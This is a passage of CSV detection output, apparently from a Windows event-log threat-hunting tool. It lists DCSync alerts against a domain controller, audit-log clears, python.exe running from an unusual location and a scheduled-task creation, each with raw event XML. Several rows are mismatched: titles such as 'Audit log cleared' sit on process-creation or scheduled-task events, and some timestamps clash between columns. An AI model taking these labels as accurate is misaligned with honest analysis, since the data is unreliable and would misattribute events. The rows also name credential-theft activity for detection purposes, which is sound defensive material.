-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1557594610.60807,2020-09-02T15:47:48.570502+04:00,,Audit,Critical,"User Name : ( IEUser ) with process : ( C:\Python27\python.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4688</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T17:10:10.342445Z"">
</TimeCreated>
<EventRecordID>18196</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""44"">
</Execution>
<Channel>Security</Channel>
<Computer>IEWIN7</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
<Data Name=""SubjectUserName"">IEUser</Data>
<Data Name=""SubjectDomainName"">IEWIN7</Data>
<Data Name=""SubjectLogonId"">0x13765</Data>
<Data Name=""NewProcessId"">0x4f0</Data>
<Data Name=""NewProcessName"">C:\Python27\python.exe</Data>
<Data Name=""TokenElevationType"">%%1938</Data>
<Data Name=""ProcessId"">0x12c</Data>
<Data Name=""CommandLine""></Data>
</EventData>
</Event>",01566s-win16-ir.threebeesco.com,Security
Process running in Unusual location,1599047268.570502,2019-05-11T21:10:10.608070+04:00,,Threat,High,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-02T11:47:39.499106Z"">
</TimeCreated>
<EventRecordID>2171289</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""420"" ThreadID=""996"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
<SubjectUserName>a-jbrown</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x38a14</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",IEWIN7,Security
Dcsync Attack detected,1553549341.035686,2019-03-26T01:29:01.035686+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.026630Z"">
</TimeCreated>
<EventRecordID>198242605</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3300"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;
RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1557594610.342445,2019-05-11T21:10:10.342445+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T17:10:06.342445Z"">
</TimeCreated>
<EventRecordID>18195</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""780"" ThreadID=""3812"">
</Execution>
<Channel>Security</Channel>
<Computer>IEWIN7</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-3583694148-1414552638-2922671848-1000</SubjectUserSid>
<SubjectUserName>IEUser</SubjectUserName>
<SubjectDomainName>IEWIN7</SubjectDomainName>
<SubjectLogonId>0x1371b</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",IEWIN7,Security
Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.026630Z"">
</TimeCreated>
<EventRecordID>198242604</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;
ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.026630Z"">
</TimeCreated>
<EventRecordID>198242603</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;
ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1552907189.911579,2019-03-18T15:06:29.911579+04:00,,Audit,Critical,schedule task created by user,4698,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4698</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T00:02:04.319945Z"">
</TimeCreated>
<EventRecordID>566836</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""452"" ThreadID=""2836"">
</Execution>
<Channel>Security</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-500</Data>
<Data Name=""SubjectUserName"">Administrator</Data>
<Data Name=""SubjectDomainName"">EXAMPLE</Data>
<Data Name=""SubjectLogonId"">0x17e2d2</Data>
<Data Name=""TaskName"">\CYAlyNSS</Data>
<Data Name=""TaskContent"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.2&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;Triggers&gt;
&lt;CalendarTrigger&gt;
&lt;StartBoundary&gt;2015-07-15T20:35:13.2757294&lt;/StartBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;ScheduleByDay&gt;
&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;
&lt;/ScheduleByDay&gt;
&lt;/CalendarTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;LocalSystem&quot;&gt;
&lt;UserId&gt;S-1-5-18&lt;/UserId&gt;
